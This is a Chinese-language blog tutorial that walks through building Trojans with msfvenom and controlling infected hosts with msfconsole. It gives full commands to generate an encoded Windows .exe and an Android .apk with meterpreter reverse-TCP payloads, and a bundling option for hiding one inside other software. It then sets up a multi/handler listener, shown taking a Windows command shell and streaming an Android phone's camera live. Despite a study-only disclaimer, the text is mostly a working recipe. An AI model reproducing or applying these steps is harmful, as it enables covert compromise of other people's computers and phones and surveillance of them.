admin 管理员组文章数量: 887021
文章目录
- 一、使用环境
- 二、msfvenom编写Trojan木马
- Ⅰ、电脑端.exe格式
- Ⅱ、移动端.apk格式
- 三、msfconsole控制感染对象
- Ⅰ、电脑端示例:`shell`获取Windows的CMD
- Ⅱ、移动端示例:`webcam_stream`获取Android摄像头实时画面
- 完
免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关
请遵守我国法律法规
一、使用环境
- VMware V15.5.0
- Kali-Linux-2020.2
- msfconsole
- msfvenom
- Windows Server 2008 R2 Enterprise
- Android10 & EMUI10.1
二、msfvenom编写Trojan木马
在Kali的终端使用msfvenom命令制作后门木马程序
Ⅰ、电脑端.exe格式
在终端输入以下指令以生成木马
msfvenom -p windows/meterpreter_reverse_tcp LHOST={Kali系统IP} LPORT={监听端口} -e x86/shikata_ga_nai -f exe -o /home/用户名/桌面/{文件名}.exe -i 5
可选参数 | 描述 |
---|---|
-p | 使用平台 |
-e | 编码方式 |
-f | 文件格式 |
-o | 存储为 |
-i | 编译次数 |
-x | 捆绑软件 |
平台选择windows/meterpreter_reverse_tcp
Ⅱ、移动端.apk格式
msfvenom -p android/meterpreter_reverse_tcp R > /home/用户名/桌面/{文件名}.apk
平台选择android/meterpreter_reverse_tcp
保存方式与电脑端不同
三、msfconsole控制感染对象
两平台主要操作相同,区别在于参数
当在Windows中打开制作好的木马后,后门便会自动开放,程序后台静默运行
在Android打开后也是同理。安全软件会直接识别并报毒
在Kali终端使用msfconsole
控制感染对象
加载exploit/multi/handler
模块
设置载荷,Windows和Android的载荷与制作程序时输入的-p
参数一致
windows/meterpreter_reverse_tcp
android/meterpreter_reverse_tcp
最后再设置LHOST和LPORT与程序的参数一致
指向Kali系统IP
配置完毕,run
运行监听
Ⅰ、电脑端示例:shell
获取Windows的CMD
Ⅱ、移动端示例:webcam_stream
获取Android摄像头实时画面
提高警惕,切勿安装不明来源的程序软件
完
欢迎在评论区留言
感谢浏览
本文标签: 木马 手机 amp msfvenom msfconsole
版权声明:本文标题:msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1726386335h950201.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论